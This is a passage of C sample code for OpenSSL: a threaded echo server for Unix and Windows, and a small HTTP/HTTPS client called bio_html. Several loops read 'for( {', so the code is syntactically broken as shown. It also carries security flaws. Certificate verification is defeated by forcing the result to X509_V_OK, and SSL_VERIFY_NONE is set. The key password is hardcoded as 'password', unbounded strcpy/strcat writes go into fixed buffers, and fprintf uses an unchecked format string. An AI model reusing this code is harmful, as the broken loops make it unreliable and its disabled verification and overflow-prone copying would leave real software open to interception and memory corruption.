SIGUSR2 signal to tell * we have activity. */ pthread_kill(arg->watchdog_thread,SIGUSR2); #else /* * Signal the watchdog thread we have socket activity */ pthread_mutex_lock(&arg->mutex); arg->signalled=1; pthread_cond_signal(&arg->cond); pthread_mutex_unlock(&arg->mutex); #endif /* * Read the available data on the SSL link. * Allocate the buffer here with a calloc, just like * in any real SSL application. We will receive len * character and we later strcat(msg,arg->message). * the received data is not necessarily zero terminated. * This message buffer is freed just before the for loop * end. */ arg->message=(char *)calloc(MAX_MESSAGE_SIZE,sizeof(char)); #if defined (BAD_PRACTICE) /* * Change this thread signal mask so we can be killed * with the SIGUSR1 signal if the SSL_read is hanging. */ pthread_sigmask(SIG_UNBLOCK,&set,NULL); #endif /* * On Linux, the SSL_read man says: * The underlying BIO is blocking, SSL_read will return, * once the read operation has been finished or an error * occured, except when a renegociation take place, in * which case a SSL_ERROR_WANT_READ may occur. */ len=SSL_read(arg->ssl,arg->message,MAX_MESSAGE_SIZE); #if defined (BAD_PRATICE) /* * Block the SIGUSR1 signal again. */ pthread_sigmask(SIG_BLOCK,&set,NULL); #endif #if !defined (BAD_PRACTICE) /* * We come here either because the SSL_read has been * canceled, either after a completed alarm(2) or * after a cond_timedwait returning a timeout. * * The testcancel is compulsary on HP-UX and Tru64, but * not on Linux FC5. The fprintf (write) is a cancelation * point. On HP-UX and Tru64 this leaves the ScreenMutex * locked. */ #if !defined (__linux__) && !defined (HPUX_READ_EINTR_PATCH) pthread_testcancel(); #endif #endif if (len <=0){ pthread_mutex_lock(&ScreenMutex); fprintf(stdout,"Client disconnected\n"); pthread_mutex_unlock(&ScreenMutex); /* * Abort the pthread_cond_timedwait or the sigwait * waiting watchdog thread. */ #if defined (USE_PTHREAD_KILL) pthread_kill(arg->watchdog_thread,SIGUSR1); #else pthread_cancel(arg->watchdog_thread); #endif pthread_exit(NULL); } pthread_mutex_lock(&ScreenMutex); fprintf(stdout,"Received %.*s\n",len,arg->message); pthread_mutex_unlock(&ScreenMutex); /* * Echo via the SSL link the data just received. */ { int i; char *msg; int sent_html=0; int size=0; if (strstr(arg->message,"GET / HTTP")) arg->http_request=1; for (i=0;i<2;i++){ switch(i){ case 0: if ((arg->http_request) && !(sent_html)){ size=strlen(HTML_PREFIX); } break; case 1: size+=len; break; } }/* end for */ msg=(char *)calloc(size+1,sizeof(char)); if (!sent_html){ strcpy(msg,HTML_PREFIX); sent_html++; } strcat(msg,arg->message); size=SSL_write(arg->ssl,msg,strlen(msg)); free(msg); if (size<=0){ /* * The remote partner exited. * Exit the thread meanwhile invoking the * finish routine. */ pthread_mutex_lock(&ScreenMutex); fprintf(stdout,"Client disconnected\n"); pthread_mutex_unlock(&ScreenMutex); /* * Abort the pthread_cond_timedwait or the sigwait * waiting watchdog thread. */ #if defined (USE_PTHREAD_KILL) pthread_kill(arg->watchdog_thread,SIGUSR1); #else pthread_cancel(arg->watchdog_thread); #endif pthread_exit(NULL); } } free(arg->message); arg->message=NULL; #if defined (__VMS) }/* end switch */ #endif }/* end for */ pthread_cleanup_pop(1); return(NULL); } long get_ia(char *str) { unsigned long ia; unsigned long temp[4]; char ch; for( { if (sscanf (str, "%d.%d.%d.%d%c", &temp[0],&temp[1],&temp[2], &temp[3],&ch) != 4) return (-1); if ((temp[0] > 255) || (temp[1] > 255) || (temp[2] > 255) || (temp[3] > 255)) return(-1); break; } ia = temp[0] + (temp[1] << 8) + (temp[2] << 16) + (temp[3] << 24); return (ia); } /* * The routine setup_sockets enables to create sockets, bind and listen on them * on a variable number of computer's network interfaces, specified on the * command line . The last parameter in the command line is an optional port. * If no argument is specified then it creates one socket bound to * 0.0.0.0:default_port. For a program, it enables specifying the following * syntax : $ ./<prog> [IP of Interface1 .. [IP of InterfaceN]] [port] * All arguments between square brackets are optional. */ int setup_sockets(int argc, char **argv, int *s, unsigned short default_port) { struct sockaddr_in s_name; /* Address struct for socket2.*/ int on = 1,i; argc--; argv++; if (argc == 0){ i=argc; memset(&s_name,0,sizeof(s_name)); s_name.sin_port = htons(default_port) ; s_name.sin_addr.s_addr = htonl(INADDR_ANY); s_name.sin_family = AF_INET ; if ((s[i] = socket (AF_INET, SOCK_STREAM, 0)) == -1){ perror("socket error") ; exit(EXIT_FAILURE); } if (setsockopt(s[i], SOL_SOCKET, SO_REUSEADDR, &on, sizeof (on)) < 0){ perror("setsockopt error") ; exit(EXIT_FAILURE); } if (bind (s[i],(struct sockaddr *)&s_name, sizeof (s_name))<0){ perror("bind error") ; exit(EXIT_FAILURE); } if (listen (s[i], 5) < 0){ perror("listen error") ; exit(EXIT_FAILURE); } } else{ for (i=0;i<argc;i++){ memset(&s_name,0,sizeof(s_name)); s_name.sin_family = AF_INET ; if ((argc >= 1) && ((get_ia(argv[argc-1]) == -1))) s_name.sin_port = htons(atoi(argv[argc-1])) ; else s_name.sin_port = htons(default_port) ; if ((argc == 1) && ((get_ia(argv[argc-1]) == -1))) s_name.sin_addr.s_addr = htonl(INADDR_ANY); else if ((s_name.sin_addr.s_addr =get_ia(argv[i])) == -1) break; if ((s[i] = socket (AF_INET, SOCK_STREAM, 0)) == -1){ perror("socket error") ; exit(EXIT_FAILURE); } if (setsockopt(s[i], SOL_SOCKET, SO_REUSEADDR, &on, sizeof (on)) < 0){ perror("setsockopt error") ; exit(EXIT_FAILURE); } if (bind (s[i],(struct sockaddr *)&s_name, sizeof (s_name))<0){ perror("bind error") ; exit(EXIT_FAILURE); } if (listen (s[i], 5) < 0){ perror("listen error") ; exit(EXIT_FAILURE); } }/* end for */ }/* end else */ argc=i; if (argc == 0) argc++; return argc; } int main(int argc,char **argv) { int s[10]; /* sockets */ int i; struct sockaddr_in s_name; /* Address struct for socket2.*/ socklen_t namelength; fd_set rd_msk; arg_t *arg; pthread_t dynthread; SSL_CTX *ctx; pthread_attr_t attr; #if defined (__unix__) || defined (__unix) sigset_t set; #endif /* * For Unix systems we use a pthread_kill instead of a pthread_cancel * So set signal mask and use pthread_sigmask to block or unblock * SIGUSR1 signal. If good practice, then block SIGALRM as well. */ #if defined (BAD_PRACTICE) struct sigaction action; warning(); #endif fprintf(stderr," beginning of the program\n "); argc=setup_sockets(argc,argv,s,AUXSERVER_PORT); pthread_mutex_init(&ScreenMutex,NULL); SSL_load_error_strings(); // Initialize the SSL library. SSL_library_init(); OpenSSL_add_all_ciphers(); /* * Create an SSL context that will be used to communicate over SSLv2, SSLv3, * or TLSv1 protocol, depending on the choice made by the remote partner * program. */ if ((ctx=SSL_CTX_new(SSLv23_server_method()))==NULL) berr_exit("Can't initialize SSLv23 context"); if (!SSL_CTX_use_certificate_chain_file(ctx,KEYFILE)) berr_exit("Can't read certificate"); SSL_CTX_set_default_passwd_cb(ctx,password_cb); if (!SSL_CTX_use_PrivateKey_file(ctx, KEYFILE, SSL_FILETYPE_PEM)) berr_exit("Can't read key file"); if (!SSL_CTX_load_verify_locations(ctx,CA_LIST,0)) berr_exit("Can't read CA list"); #if defined (__unix__) || defined (__unix) sigemptyset(&set); sigaddset(&set,SIGPIPE); #if defined (USE_PTHREAD_KILL) sigaddset(&set,SIGUSR1); #if !defined (BAD_PRATICE) sigaddset(&set,SIGUSR2); sigaddset(&set,SIGALRM); #endif #endif pthread_sigmask(SIG_SETMASK,&set,NULL); pthread_sigmask(SIG_BLOCK,&set,NULL); #endif #if defined (BAD_PRACTICE) /* * On Unix, a signal handler is shared by all threads. * This handler is established for both the serve_connection * thread and the watchdog thread. We do not use the signal * statement as on Linux it has an undefined behavior in * multi-threaded applications. */ action.sa_handler=SIGUSR1_handler; action.sa_flags=SA_RESTART; sigemptyset(&action.sa_mask); sigaction(SIGUSR1,&action,NULL); #endif pthread_attr_init(&attr); #if 0 /* the call below is unnecessary in this case as the default stack size * seems to be sufficient on all tested operating systems. It is there * to highlight how one can set a thread stacksize before it gets created. * The stacksize parameter for the CreateThread on Windows must be * specified. */ pthread_attr_setstacksize(&attr,10*PTHREAD_STACK_MIN); #endif pthread_attr_setdetachstate(&attr,PTHREAD_CREATE_DETACHED); for ({ namelength = sizeof (s_name); arg = (arg_t *)malloc(sizeof (arg_t)); memset(arg,0,sizeof(arg_t)); FD_ZERO(&rd_msk); for (i=0;i<argc;i++) FD_SET(s[i],&rd_msk); select(getdtablesize(),&rd_msk,NULL,NULL,NULL); for (i=0;i<argc;i++){ if (FD_ISSET(s[i],&rd_msk)) arg->s = accept (s[i],(struct sockaddr *)&s_name,&namelength) ; } if (arg->s == -1){ pthread_mutex_lock(&ScreenMutex); perror ("accept error") ; pthread_mutex_unlock(&ScreenMutex); free(arg); exit(EXIT_FAILURE); } pthread_mutex_lock(&ScreenMutex); fprintf (stderr,"Client address : %s\n",inet_ntoa(s_name.sin_addr)); fprintf (stderr,"Client port : %d\n",ntohs(s_name.sin_port) ) ; pthread_mutex_unlock(&ScreenMutex); /* * Create a new SSL context based upon what we chose on the CTX context * which will handle the SSL link with the remote peer. */ arg->ssl=SSL_new(ctx); /* * Start the thread that will serve the connection */ pthread_create(&arg->connection_thread, &attr, serve_connection, arg); } return 1; } /* end main */ ******** * sslserver_windows.c ******* #ifdef WIN32 #include <io.h> #include <winsock2.h> #include <process.h> #else #include <netdb.h> #endif #include <stdio.h> #include <string.h> #include <ctype.h> #include <stdio.h> #include <errno.h> #include <openssl/ssl.h> #include <openssl/err.h> #ifdef __VMS #include <unixio.h> #elif !defined (WIN32) #include <unistd.h> #endif #define AUXSERVER_PORT 60000 #define MAX_MESSAGE_SIZE 50000 #define KEYFILE "server.pem" #define PASSWORD "password" #define CA_LIST "root.pem" #define MAX_OUTSTANDING_CONNECTIONS 5 #define HTML_PREFIX "HTTP/1.1 200 OK\n\ Content-Type:text/html\n\n\ <!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN\">\n\ <HTML>\n\ <HEAD>\n\ <TITLE>sslserver echo</TITLE>\n\ <META HTTP-EQUIV=\"Content-Type\" CONTENT=\"text/html; charset=iso-8859-1\">\n\ </HEAD>\n\ <BODY>\n\ <PRE>\n" #define HTML_SUFFIX "</PRE>\n\ </BODY>\n\ </HTML>\n" #if defined (__VMS) #define socklen_t unsigned int #endif #if defined (WIN32) #define socklen_t int #define close closesocket #endif static char *pass; static int password_cb(char *buf,int num,int rwflag, void *userdata) { if (num<(int)strlen(pass)+1) return 0; strcpy(buf,pass); return(strlen(pass)); } typedef struct { SOCKET s; SSL *ssl; BIO *sbio; DWORD ThreadId; HANDLE cond; } arg_t; // Small error handling routine, that prints out the error, plus OpenSSL // relevant information upon why the call failed. void berr_exit(char *str){ fprintf(stderr,"%s\n",str); ERR_print_errors_fp(stderr); exit(EXIT_FAILURE); } void cleanup(arg_t *arg) { int retval; /* * write html suffix and close the connection */ retval=SSL_write(arg->ssl,HTML_SUFFIX,strlen(HTML_SUFFIX)); BIO_free_all(arg->sbio); retval = close (arg->s); if (retval) perror ("close"); } /* end cleanup*/ void finish(void *ptr){ arg_t *arg =(arg_t *)ptr; cleanup (arg) ; CloseHandle(arg->cond); free(arg); } char *WSAStrError (int WSAError){ /* * All Windows Sockets error constants are biased by WSABASEERR from * the "normal" */ struct WSAerrno { char *text; int value; }; static struct WSAerrno ErrorTable [] ={ "WSABASEERR", WSABASEERR, /* * Windows Sockets definitions of regular Microsoft C error constants */ "WSAEINTR", (WSABASEERR+4), "WSAEBADF", (WSABASEERR+9), "WSAEACCES", (WSABASEERR+13), "WSAEFAULT", (WSABASEERR+14), "WSAEINVAL", (WSABASEERR+22), "WSAEMFILE", (WSABASEERR+24), /* * Windows Sockets definitions of regular Berkeley error constants */ "WSAEWOULDBLOCK", (WSABASEERR+35), "WSAEINPROGRESS", (WSABASEERR+36), "WSAEALREADY", (WSABASEERR+37), "WSAENOTSOCK", (WSABASEERR+38), "WSAEDESTADDRREQ", (WSABASEERR+39), "WSAEMSGSIZE", (WSABASEERR+40), "WSAEPROTOTYPE", (WSABASEERR+41), "WSAENOPROTOOPT", (WSABASEERR+42), "WSAEPROTONOSUPPORT", (WSABASEERR+43), "WSAESOCKTNOSUPPORT", (WSABASEERR+44), "WSAEOPNOTSUPP", (WSABASEERR+45), "WSAEPFNOSUPPORT", (WSABASEERR+46), "WSAEAFNOSUPPORT", (WSABASEERR+47), "WSAEADDRINUSE", (WSABASEERR+48), "WSAEADDRNOTAVAIL", (WSABASEERR+49), "WSAENETDOWN", (WSABASEERR+50), "WSAENETUNREACH", (WSABASEERR+51), "WSAENETRESET", (WSABASEERR+52), "WSAECONNABORTED", (WSABASEERR+53), "WSAECONNRESET", (WSABASEERR+54), "WSAENOBUFS", (WSABASEERR+55), "WSAEISCONN", (WSABASEERR+56), "WSAENOTCONN", (WSABASEERR+57), "WSAESHUTDOWN", (WSABASEERR+58), "WSAETOOMANYREFS", (WSABASEERR+59), "WSAETIMEDOUT", (WSABASEERR+60), "WSAECONNREFUSED", (WSABASEERR+61), "WSAELOOP", (WSABASEERR+62), "WSAENAMETOOLONG", (WSABASEERR+63), "WSAEHOSTDOWN", (WSABASEERR+64), "WSAEHOSTUNREACH", (WSABASEERR+65), "WSAENOTEMPTY", (WSABASEERR+66), "WSAEPROCLIM", (WSABASEERR+67), "WSAEUSERS", (WSABASEERR+68), "WSAEDQUOT", (WSABASEERR+69), "WSAESTALE", (WSABASEERR+70), "WSAEREMOTE", (WSABASEERR+71), "WSAEDISCON", (WSABASEERR+101), /* * Extended Windows Sockets error constant definitions */ "WSASYSNOTREADY", (WSABASEERR+91), "WSAVERNOTSUPPORTED", (WSABASEERR+92), "WSANOTINITIALISED", (WSABASEERR+93), /* * Error return codes from gethostbyname() and gethostbyaddr() * (when using the resolver). Note that these errors are * retrieved via WSAGetLastError() and must therefore follow * the rules for avoiding clashes with error numbers from * specific implementations or language run-time systems. * For this reason the codes are based at WSABASEERR+1001. * Note also that [WSA]NO_ADDRESS is defined only for * compatibility purposes. */ /* Authoritative Answer: Host not found */ "WSAHOST_NOT_FOUND", (WSABASEERR+1001), /* Non-Authoritative: Host not found, or SERVERFAIL */ "WSATRY_AGAIN", (WSABASEERR+1002) }; int i; static char buffer[100]; for (i=0;i<sizeof (ErrorTable)/sizeof (struct WSAerrno);i++) if (ErrorTable[i].value == WSAError) return (ErrorTable[i].text); if (i== sizeof (ErrorTable)/sizeof (struct WSAerrno)) sprintf (buffer,"WSAUNKNOWNERR %d",WSAError); return (buffer); } DWORD WINAPI connection_watchdog(arg_t *arg){ #define SLEEP_TIME 1000 // 1 second DWORD ret; for ({ ret = WaitForSingleObject(arg->cond,SLEEP_TIME); if (ret == WAIT_TIMEOUT){ /* * Time elapsed without any SSL activity. Post a WM_USER+1 message to the * target serve_connection thread's message queue and exit this thread. */ PostThreadMessage(arg->ThreadId,WM_USER+1,0,0); _endthreadex(0); } if (ret != WAIT_OBJECT_0) _endthreadex(0); } } DWORD WINAPI serve_connection (arg_t *arg){ int len; int sent_html=0; char *message=NULL; HANDLE hThread; DWORD hThreadId; MSG msg; fd_set rmask; struct timeval timeout={0,10000}; char *current_cipher_name; /* * Initialize a message queue for this thread. */ PeekMessage(&msg,NULL,WM_USER,WM_USER,PM_NOREMOVE); /* * Complete the SSL connection from the remote peer. */ arg->sbio=BIO_new_socket((int)arg->s,BIO_NOCLOSE); if (arg->sbio == NULL){ printf("sbio NULL\n"); exit(EXIT_FAILURE); } SSL_set_bio(arg->ssl,arg->sbio,arg->sbio); /* * Choose the encryption algorythm by selecting a cipher. * As bio_html is a SSL V2 client, one must choose a sslv2 cipher. * To get available ciphers to choose for this application, enter the * command: * openssl ciphers -v -sslv2 * The EXP1024-DHE-DSS-RC4-SHA cipher is a sslv3 cipher and cannot be used * here with a sslv2 client. */ // if (SSL_set_cipher_list(arg->ssl,"EXP1024-DHE-DSS-RC4-SHA") <= 0) // berr_exit("cipher could not be set"); /* * This server will send its X509 certificate to the client when the * connection is accepted, but using SSL_VERIFY_NONE, this program does * not require a certificate from the remote SSL peer. */ SSL_set_verify(arg->ssl,SSL_VERIFY_NONE,NULL); /* * Do accept the SSL connection. */ if ((len=SSL_accept(arg->ssl))<=0){ fprintf(stderr,"SSL accept error\n"); ERR_print_errors_fp(stderr); goto out; } current_cipher_name=(char *)SSL_get_cipher_name(arg->ssl); printf("Using cipher %s\n",current_cipher_name); /* * Create a unnamed counting semaphore with initial value * of 0 (blocking). */ arg->cond = CreateSemaphore (NULL, // Seamphore attributes 0, // initial count 1, // maximum count NULL); // Semaphore name /* * Start the connection activity watchdog. */ hThread = (HANDLE)_beginthreadex(NULL, // Thread Attributes. 1000, // Initial Stack size. connection_watchdog, // Thread entry point arg, // Thread paramet 0, // Thread is to start imediadetly &hThreadId); if(hThread == 0){ fprintf (stdout, "Error creating socket's link Thread handler\n"); goto out; } /* * loop waiting for activity on the socket. */ for ({ FD_ZERO(&rmask); FD_SET(arg->s,&rmask); /* * Use a timeout on the select in order to be able to PeekMessage */ switch (select(arg->s+1,&rmask,NULL,NULL,&timeout)){ case 0: /* * If we have a WM_USER+1 message on our thread message queue, * exit this thread. */ if (PeekMessage(&msg,(HWND)(-1),WM_USER+1,WM_USER+1,PM_REMOVE)) goto out; else continue; case -1: fprintf (stdout,"Select Error (%s)",WSAStrError(WSAGetLastError())); goto out; break ; default: /* * Signal the connection watchdog we have socket activity */ ReleaseSemaphore (arg->cond,1,NULL); /* * Read the available data on the SSL link. */ message=(char *)calloc(MAX_MESSAGE_SIZE,sizeof(char)); len=SSL_read(arg->ssl,message,MAX_MESSAGE_SIZE); if (len <=0){ fprintf(stdout,"Client disconnected\n"); goto out; } fprintf(stdout,"Received %.*s\n",len,message); /* * Echo via the SSL link the data just received. */ { int i; char *msg; size_t size=0; for (i=0;i<2;i++){ switch(i){ case 0: if (!sent_html){ size=strlen(HTML_PREFIX); } break; case 1: size+=len;break; break; } }/* end for */ msg=(char *)calloc(size+1,sizeof(char)); if (!sent_html){ strcpy(msg,HTML_PREFIX); sent_html++; } strcat(msg,message); size=SSL_write(arg->ssl,msg,size); free(msg); if (size==0) /* * The remote partner exited. * Exit the thread meanwhile invoking the * finish routine. */ goto out; if (size<0) berr_exit("Error writing to SSL socket"); } free(message); }/* end switch */ }/* end for */ out:; finish(arg); _endthreadex(0); return 0; } int main (int argc, char **argv) { SOCKET s,lsock; int address_len; arg_t *arg; char *level = "PF_INET"; struct sockaddr_in this,from; WORD wVersionRequested; WSADATA wsaData; HANDLE hThread; SSL_CTX *ctx; // int on; wVersionRequested = MAKEWORD(2,0); if(WSAStartup(wVersionRequested,&wsaData)!=0){ fprintf (stderr,"WSAStartup failed\n"); return (EXIT_FAILURE); } if ((LOBYTE(wsaData.wVersion) != 2) || (HIBYTE(wsaData.wVersion) != 0)) { fprintf (stderr,"WSAStartup bad version %d,%d\n", LOBYTE(wsaData.wVersion), HIBYTE(wsaData.wVersion)); WSACleanup(); return (EXIT_FAILURE); } fprintf(stdout," beginning of the program\n "); SSL_load_error_strings(); // Initialize the SSL library. SSL_library_init(); OpenSSL_add_all_ciphers(); /* * Create a TCPIP (stream) socket. */ if ((lsock = socket ( PF_INET,SOCK_STREAM,0)) == INVALID_SOCKET) { fprintf (stderr,"socket lsock error = %d\n",WSAGetLastError()); WSACleanup(); return (EXIT_FAILURE); } /* * Now bind lsock to a TCPIP port number */ memset (&this, 0, sizeof (this)); this.sin_family = PF_INET ; this.sin_port = htons(AUXSERVER_PORT); this.sin_addr.s_addr = htonl(INADDR_ANY); if ( bind (lsock,(struct sockaddr *)&this,sizeof (this))== SOCKET_ERROR) { fprintf (stderr,"bind lsock error = %s\n",WSAStrError(WSAGetLastError())); WSACleanup(); return (EXIT_FAILURE); } /* Wait for connections requests (listen) and redirect the connection to a * dynamic socket s (accept). */ if (listen (lsock, MAX_OUTSTANDING_CONNECTIONS)== SOCKET_ERROR) { fprintf (stderr,"listen error = %s\n",WSAStrError(WSAGetLastError())); WSACleanup(); return (EXIT_FAILURE); } /* * Create an SSL context that will be used to communicate over SSLv2, or SSLv3 * or TLSv1 protocol depending on the choice of the remote partner program. */ if ((ctx=SSL_CTX_new(SSLv23_server_method()))==NULL) berr_exit("Can't initialize SSLv23 context"); if (!SSL_CTX_use_certificate_chain_file(ctx,KEYFILE)) berr_exit("Can't read certificate"); pass=PASSWORD; SSL_CTX_set_default_passwd_cb(ctx,password_cb); if (!SSL_CTX_use_PrivateKey_file(ctx, KEYFILE, SSL_FILETYPE_PEM)) berr_exit("Can't read key file"); if (!SSL_CTX_load_verify_locations(ctx,CA_LIST,0)) berr_exit("Can't read CA list"); for ({ address_len = sizeof(from); if((s = accept (lsock, (struct sockaddr *)&from,&address_len)) == INVALID_SOCKET){ fprintf (stderr,"accept error %s",WSAStrError(WSAGetLastError())); WSACleanup(); return (EXIT_FAILURE); } fprintf (stdout,"Client address : %s\n",inet_ntoa(from.sin_addr)) ; fprintf (stderr,"Client port : %d\n",ntohs(from.sin_port) ) ; /* Now we can create a thread that will serve the connection on socket s * this will be simulated by a call to a subroutine. */ // Create the dynamic thread arg = malloc(sizeof(arg_t)); arg->s = s; arg->ssl=SSL_new(ctx); hThread = (HANDLE)_beginthreadex(NULL, // Thread Attributes. 1000000, // Initial Stack size. serve_connection, // Thread entry point arg, // Thread parameter. 0, // Thread is to start imediadetly &arg->ThreadId); if(hThread == 0){ fprintf (stderr, "Error creating socket's link Thread handler\n"); WSACleanup(); return (EXIT_FAILURE); } } /* end for( */ return (EXIT_SUCCESS); } ******* * bio_html.c ******* #ifdef WIN32 #include <winsock2.h> #else #include <netdb.h> #endif #include <stdio.h> #include <string.h> #include <ctype.h> #include <stdio.h> #include <errno.h> #include <openssl/ssl.h> #include <openssl/err.h> #ifdef __VMS #include <unixio.h> #else #include <unistd.h> #endif #if defined (_XOPEN_SOURCE_EXTENDED) && defined (__hpux) #include <sys/byteorder.h> #endif // Define possible WEB ports. #define HTTP_PROXY_PORT 8080 #define HTTP_PORT 80 #define HTTPS_PORT 443 #ifndef WIN32 #define SOCKET int #define SOCKET_ERROR -1 #endif // Setup constants. char const *http = "http://"; char const *https = "https://"; char const *CRLF = "\015\012"; extern char *encode_64(char *str, const char *eol); // // This routine parses the command line to determine the remote host and port // where to connect to, according to most Web browsers rules. It recognizes if // the http command contains an authentification string (Username/password). char *parse(char *command,char **filters, short number_filters, char *which,unsigned short *port, char **userpasswd){ char const slash = '/'; char const star = '*'; char *cp,*cp1,*cp2; static char *host; int j; cp = strstr(command,http); cp2 = strstr(command,https); if ((cp != command) && (cp2 != command)){ fprintf(stderr,"Bad http:// command : %s\n",command);; exit(0); } if (cp) cp += strlen(http); if (cp2) cp = cp2 + strlen(https); if ((cp1 = strchr(cp,'@')) == NULL){ *userpasswd = NULL; // host located, return string after the first single slash. host = cp; } else{ *cp1++ = '\0'; host = cp1; *userpasswd = cp; cp = cp1; } cp = strchr(host,slash); if (cp == NULL) strcpy(which,"/"); else { strcpy(which,cp); *cp = '\0'; } // Now determine the port we will use. // The rule is that if found in the set of filters, // we use port 80, otherwise port=8080. // The star character in an address filter must be in // first position. if (number_filters >= 0) *port = HTTP_PROXY_PORT; // Assume not found in the filters. else{ if (strstr(command,https)) *port=HTTPS_PORT; else *port = HTTP_PORT; } for (j=0; j< number_filters;j++){ if (strstr(host,filters[j] + sizeof(star)) != NULL){ if (strstr(command,https)) *port=HTTPS_PORT; else *port=HTTP_PORT; break; } } return host; } void usage(char *str){ fprintf(stderr,"Syntax : %s <http command> [<proxy server name>]",str); fprintf(stderr,"[<filter1> .. <filterN>]\n"); fprintf(stderr,"Examples : "); fprintf(stderr,"%s http://www.compaq.com/\n",str); fprintf(stderr,"With authentification string : %s http://vouters:vouters@sos6.evt.cpqcorp.net/\n",str); fprintf(stderr,"With alternate HTTP port (default 80) : %s http://sos6.evt.cpqcorp.net:82/\n",str); fprintf(stderr,"With alternate HTTP_PROXY port (default 8080) : %s http://www.compaq.fr/ proxy:8086\n",str); exit(0); } // Small error handling routine, that prints out the error, plus OpenSSL // relevant information upon why the call failed. void berr_exit(char *str){ fprintf(stderr,str); ERR_print_errors_fp(stderr); exit(EXIT_FAILURE); } #ifdef WIN32 int strcasecmp(char *s1,char *s2){ while ((*s1 != '\0') && (*s2 != '\0')){ if (toupper(*s1) > toupper(*s2)) return 1; if (toupper(*s1++) < toupper(*s2++)) return -1; } return 0; } #endif /* * Check that the common name matches the * host name */ void check_cert(SSL *ssl, char *host){ X509 *peer; char peer_CN[256]; // This statement is compulsary to get the certificate verified. SSL_set_verify_result(ssl,X509_V_OK); // Verify certificate //if ((peer=SSL_get_peer_certificate(ssl)) == NULL) // berr_exit("Could not get peer certificate\n"); if (SSL_get_verify_result(ssl) != X509_V_OK) berr_exit("Certificate doesn't verify\n"); /*Check the cert chain. The chain length is automatically checked by OpenSSL when we set the verify depth in the ctx */ /*Check the common name*/ peer=SSL_get_peer_certificate(ssl); X509_NAME_get_text_by_NID (X509_get_subject_name(peer), NID_commonName, peer_CN, 256); if(strcasecmp(peer_CN,host)){ fprintf(stderr,"Peer name %s doesn't match host name %s\n",peer_CN,host); exit(EXIT_FAILURE); } } SOCKET tcp_connect(char *connect_str){ struct hostent *hp; struct sockaddr_in addr; SOCKET sock; char *Webhost=connect_str; unsigned short port; char *cp; char error[80]; if((cp=strrchr(connect_str,':')) == NULL){ fprintf(stderr,"Bad syntax %s\n", connect_str); exit(EXIT_FAILURE); } *cp='\0'; cp++; port=(unsigned short)atoi(cp); if(!(hp=gethostbyname(Webhost))) berr_exit("Couldn't resolve host"); memset(&addr,0,sizeof(addr)); addr.sin_addr=*(struct in_addr*)hp->h_addr_list[0]; addr.sin_family=AF_INET; addr.sin_port=htons(port); if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))<0){ sprintf(error,"Couldn't create socket %s\n",strerror(errno)); berr_exit(error); } if (connect(sock,(struct sockaddr *)&addr,sizeof(addr))<0){ sprintf(error,"Couldn't connect socket %s\n",strerror(errno)); #ifndef WIN32 close(sock); #else closesocket(sock); #endif berr_exit(error); } return sock; } // This routine handle a https request. It uses a Secure Socket handle to // communicate with the remote HTTP server. void https_connection_handle(char *connect_str, char *tmpbuf){ SSL_CTX *ctx; SSL *ssl; BIO *cbio,*out; int len; char str[80]; SOCKET s; char *cp=tmpbuf; int r; SSL_load_error_strings(); // Initialize the SSL library. SSL_library_init(); OpenSSL_add_all_ciphers(); // Create an SSL context that will be used to communicate over TLSv1 or SSLv2 or SSLv3 // protocols. // See RFC 2818. if ((ctx=SSL_CTX_new(SSLv23_client_method()))==NULL) berr_exit("Can't initialize SSLv23 context"); SSL_CTX_set_verify(ctx,SSL_VERIFY_NONE,NULL); // Connect to remote peer either proxy or https server // using classic Socket API. Get the actual host name through host variable. s=tcp_connect(connect_str); //Connect SSL to CTX ssl=SSL_new(ctx); // Associate BIO cbio with socket s cbio=BIO_new_socket((int)s,BIO_NOCLOSE); SSL_set_bio(ssl,cbio,cbio); // Set mode no retry. SSL_set_mode(ssl, SSL_MODE_AUTO_RETRY); out = BIO_new_fp(stdout, BIO_NOCLOSE); // Establish a link with the remote SSL session using chosen transport. if(SSL_connect(ssl) <= 0){ sprintf(str,"Error connecting to server's session\n"); berr_exit(str); } check_cert(ssl,connect_str); // Now emit over the network the https:// string. len=(int)strlen(cp); while (len){ r = SSL_write(ssl,cp,len); if (r>0){ len -=r; cp += r; } else{ if (r==0){ fprintf (stderr,"Partner exited...\n"); goto end; } else berr_exit("SSL_write error"); } } for( { len = SSL_read(ssl, tmpbuf, 1024); if(len <= 0) break; BIO_write(out, tmpbuf, len); //fwrite(tmpbuf,1,len,stdout); } BIO_write(out,"\n",sizeof("\n")); //fwrite("\n",1,sizeof("\n"),stdout); end:; SSL_shutdown(ssl); BIO_free_all(cbio); BIO_free(out); } // This routine handles a http request. Also it uses OpenSSL BIO functions, // the connection is unsecure. It can be expressed with a classic TCP/IP // communication. void http_connection_handle(char *connect_str,char *tmpbuf){ BIO *cbio, *out; int len; char str[80]; ERR_load_crypto_strings(); cbio = BIO_new_connect(connect_str); out = BIO_new_fp(stdout,BIO_NOCLOSE); if(BIO_do_connect(cbio) <= 0) { sprintf(str, "Error connecting to server %s\n",connect_str); berr_exit(str); } BIO_puts(cbio, tmpbuf); for( { len = BIO_read(cbio, tmpbuf, 1024); if(len <= 0) break; BIO_write(out, tmpbuf, len); //fwrite(tmpbuf,1,len,stdout); } BIO_write(out,"\n",sizeof("\n")); //fwrite("\n",1,sizeof("\n"),stdout); BIO_free(cbio); BIO_free(out); } int main(int argc, char **argv){ char *proxy_server; char *host; char tmpbuf[1024]; unsigned short port, http_proxy_port = HTTP_PROXY_PORT; char Webpage[80]; char *userpwd; char *cp; char connect_str[80]; #ifdef WIN32 WORD wVersionRequested = MAKEWORD (2,0); WSADATA wsaData; int err; #endif #ifdef WIN32 CRYPTO_malloc_init(); #endif if (argc < 2) usage(argv[0]); proxy_server=argv[2]; host = parse(argv[1],&argv[3],argc-3,Webpage,&port,&userpwd); if ((proxy_server != NULL) && (strcmp(proxy_server,""))){ // Parse a proxy server with a colon followed by // the http default proxy port. cp = strchr(proxy_server,':'); if (cp != NULL){ *cp = 0; cp++; if (port != HTTP_PORT) port = http_proxy_port = (unsigned short)atoi(cp); } } // did the user specified a HTTP_PORT ? if ((cp = strchr(host,':')) != NULL){ *cp++ = '\0'; port = (unsigned short)atoi(cp); if ((port == http_proxy_port) && (!proxy_server)) proxy_server = host; } // Setup the HTTP command. strcpy(tmpbuf,"GET "); if (port == http_proxy_port){ if (strstr(argv[1],https)) strcat(tmpbuf,https); else strcat(tmpbuf,http); strcat(tmpbuf,host); } strcat(tmpbuf,Webpage); strcat(tmpbuf," HTTP/1.1"); strcat(tmpbuf,CRLF); 